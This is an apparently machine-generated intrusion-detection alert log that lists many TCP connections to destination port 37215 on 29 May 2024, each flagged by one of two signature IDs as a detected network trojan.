                Timestamp:05/29/24-15:15:11.667662
                SID:2829579
                Source Port:60890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422025
                SID:2829579
                Source Port:45070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728742
                SID:2829579
                Source Port:58524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681774
                SID:2829579
                Source Port:38616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324870
                SID:2835222
                Source Port:51400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000967
                SID:2835222
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.965419
                SID:2835222
                Source Port:51246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558528
                SID:2829579
                Source Port:46644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562102
                SID:2829579
                Source Port:36824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228829
                SID:2835222
                Source Port:57208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818373
                SID:2829579
                Source Port:39924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.656017
                SID:2829579
                Source Port:59272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912740
                SID:2835222
                Source Port:40970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184593
                SID:2835222
                Source Port:46704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783763
                SID:2835222
                Source Port:36508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868004
                SID:2829579
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.591149
                SID:2835222
                Source Port:58290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944117
                SID:2835222
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419196
                SID:2829579
                Source Port:40746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225952
                SID:2829579
                Source Port:52162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900234
                SID:2829579
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287832
                SID:2829579
                Source Port:58046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897643
                SID:2835222
                Source Port:49254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.916112
                SID:2835222
                Source Port:51370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166118
                SID:2829579
                Source Port:43702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563388
                SID:2835222
                Source Port:49842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663628
                SID:2835222
                Source Port:57766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.863949
                SID:2829579
                Source Port:35814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263030
                SID:2835222
                Source Port:42902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933322
                SID:2829579
                Source Port:34756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964726
                SID:2829579
                Source Port:43244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023479
                SID:2835222
                Source Port:44116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464102
                SID:2829579
                Source Port:50456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262525
                SID:2829579
                Source Port:49570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583897
                SID:2835222
                Source Port:57800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807478
                SID:2829579
                Source Port:37510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363483
                SID:2835222
                Source Port:51686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279195
                SID:2829579
                Source Port:40180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434576
                SID:2829579
                Source Port:33010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941410
                SID:2835222
                Source Port:43950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583312
                SID:2835222
                Source Port:49532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109162
                SID:2829579
                Source Port:48818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171725
                SID:2829579
                Source Port:44750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502910
                SID:2829579
                Source Port:43154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.044980
                SID:2835222
                Source Port:37050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826857
                SID:2835222
                Source Port:40590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997820
                SID:2835222
                Source Port:41104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618728
                SID:2829579
                Source Port:41738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180351
                SID:2835222
                Source Port:50946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325512
                SID:2829579
                Source Port:50028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662001
                SID:2835222
                Source Port:33312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292920
                SID:2829579
                Source Port:43574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444434
                SID:2829579
                Source Port:60560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189788
                SID:2835222
                Source Port:40780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573303
                SID:2835222
                Source Port:38286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534228
                SID:2829579
                Source Port:60590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730338
                SID:2835222
                Source Port:38886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721747
                SID:2829579
                Source Port:51180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931931
                SID:2835222
                Source Port:48654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.271993
                SID:2829579
                Source Port:46120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689098
                SID:2835222
                Source Port:34344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.236054
                SID:2829579
                Source Port:57218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782679
                SID:2829579
                Source Port:34176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316140
                SID:2829579
                Source Port:54170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873290
                SID:2835222
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499165
                SID:2835222
                Source Port:46378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629897
                SID:2829579
                Source Port:50012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329070
                SID:2829579
                Source Port:51802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226634
                SID:2835222
                Source Port:43272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182697
                SID:2835222
                Source Port:52554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664197
                SID:2829579
                Source Port:58818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711393
                SID:2829579
                Source Port:50728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905485
                SID:2835222
                Source Port:50668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236695
                SID:2835222
                Source Port:39990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989082
                SID:2829579
                Source Port:38088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943641
                SID:2829579
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436390
                SID:2835222
                Source Port:50288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100847
                SID:2829579
                Source Port:46198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.506169
                SID:2829579
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317798
                SID:2835222
                Source Port:60328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659757
                SID:2835222
                Source Port:52346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764450
                SID:2829579
                Source Port:41806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848907
                SID:2835222
                Source Port:58180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948915
                SID:2835222
                Source Port:42508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076615
                SID:2835222
                Source Port:43916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899157
                SID:2835222
                Source Port:54130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557752
                SID:2835222
                Source Port:53432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.904991
                SID:2829579
                Source Port:34904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855131
                SID:2835222
                Source Port:53122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.093946
                SID:2835222
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.131722
                SID:2829579
                Source Port:49394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567250
                SID:2829579
                Source Port:56790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561144
                SID:2835222
                Source Port:42052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.985468
                SID:2835222
                Source Port:54376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810577
                SID:2829579
                Source Port:52082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024788
                SID:2829579
                Source Port:49462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231579
                SID:2835222
                Source Port:37688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009878
                SID:2829579
                Source Port:37602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335072
                SID:2829579
                Source Port:42540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.638933
                SID:2829579
                Source Port:53108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177362
                SID:2829579
                Source Port:41966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767612
                SID:2829579
                Source Port:51976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.605306
                SID:2829579
                Source Port:37032
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897122
                SID:2829579
                Source Port:47830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286980
                SID:2835222
                Source Port:48956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215693
                SID:2829579
                Source Port:44454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869437
                SID:2829579
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.842599
                SID:2835222
                Source Port:54010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911187
                SID:2829579
                Source Port:46974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844709
                SID:2835222
                Source Port:50142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189632
                SID:2829579
                Source Port:56106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557015
                SID:2835222
                Source Port:49776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561720
                SID:2835222
                Source Port:56258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.929135
                SID:2829579
                Source Port:33072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233864
                SID:2835222
                Source Port:39276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267895
                SID:2829579
                Source Port:41188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624917
                SID:2835222
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154487
                SID:2835222
                Source Port:41742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681545
                SID:2835222
                Source Port:59628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380372
                SID:2829579
                Source Port:60454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787045
                SID:2835222
                Source Port:50090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812990
                SID:2829579
                Source Port:47790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265531
                SID:2829579
                Source Port:54542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795899
                SID:2835222
                Source Port:60162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782994
                SID:2835222
                Source Port:53762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437198
                SID:2829579
                Source Port:47562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.469622
                SID:2835222
                Source Port:51830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274242
                SID:2829579
                Source Port:58812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613243
                SID:2835222
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420987
                SID:2835222
                Source Port:51642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436334
                SID:2829579
                Source Port:36426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654572
                SID:2835222
                Source Port:38560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521046
                SID:2829579
                Source Port:47896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914279
                SID:2835222
                Source Port:36732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914864
                SID:2829579
                Source Port:41448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231277
                SID:2829579
                Source Port:45112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281409
                SID:2835222
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611094
                SID:2829579
                Source Port:56370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519726
                SID:2829579
                Source Port:55146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.777949
                SID:2835222
                Source Port:45968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689081
                SID:2835222
                Source Port:56466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941061
                SID:2835222
                Source Port:45864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763111
                SID:2835222
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551307
                SID:2829579
                Source Port:59058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728577
                SID:2835222
                Source Port:50962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025607
                SID:2835222
                Source Port:59374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042028
                SID:2835222
                Source Port:47872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464012
                SID:2829579
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931166
                SID:2835222
                Source Port:50000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732303
                SID:2829579
                Source Port:53536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874807
                SID:2835222
                Source Port:58826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714393
                SID:2829579
                Source Port:37970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662418
                SID:2829579
                Source Port:34806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166268
                SID:2835222
                Source Port:34342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041200
                SID:2829579
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276933
                SID:2835222
                Source Port:57634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855786
                SID:2829579
                Source Port:36296
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154853
                SID:2829579
                Source Port:47132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321198
                SID:2835222
                Source Port:38416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413544
                SID:2835222
                Source Port:51100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520307
                SID:2829579
                Source Port:33412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023285
                SID:2835222
                Source Port:58206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964533
                SID:2829579
                Source Port:34860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848229
                SID:2829579
                Source Port:33418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.557614
                SID:2835222
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422426
                SID:2835222
                Source Port:44488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.088274
                SID:2835222
                Source Port:35088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908874
                SID:2835222
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363160
                SID:2835222
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227925
                SID:2829579
                Source Port:41150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805760
                SID:2829579
                Source Port:38462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466264
                SID:2829579
                Source Port:35418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807501
                SID:2835222
                Source Port:51682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374575
                SID:2835222
                Source Port:33600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.520906
                SID:2829579
                Source Port:54334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597278
                SID:2829579
                Source Port:33814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559273
                SID:2835222
                Source Port:44952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818214
                SID:2835222
                Source Port:50896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519331
                SID:2835222
                Source Port:58942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270306
                SID:2829579
                Source Port:50536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432675
                SID:2829579
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331667
                SID:2835222
                Source Port:57638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231542
                SID:2829579
                Source Port:38784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614382
                SID:2829579
                Source Port:48550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807406
                SID:2835222
                Source Port:60844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144916
                SID:2829579
                Source Port:46066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842356
                SID:2835222
                Source Port:41276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559070
                SID:2829579
                Source Port:44194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711925
                SID:2829579
                Source Port:59496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968634
                SID:2829579
                Source Port:44628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944191
                SID:2835222
                Source Port:42280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.898232
                SID:2835222
                Source Port:47280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135538
                SID:2835222
                Source Port:60400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013263
                SID:2835222
                Source Port:38494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.673683
                SID:2835222
                Source Port:37408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562144
                SID:2829579
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944799
                SID:2829579
                Source Port:48988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419326
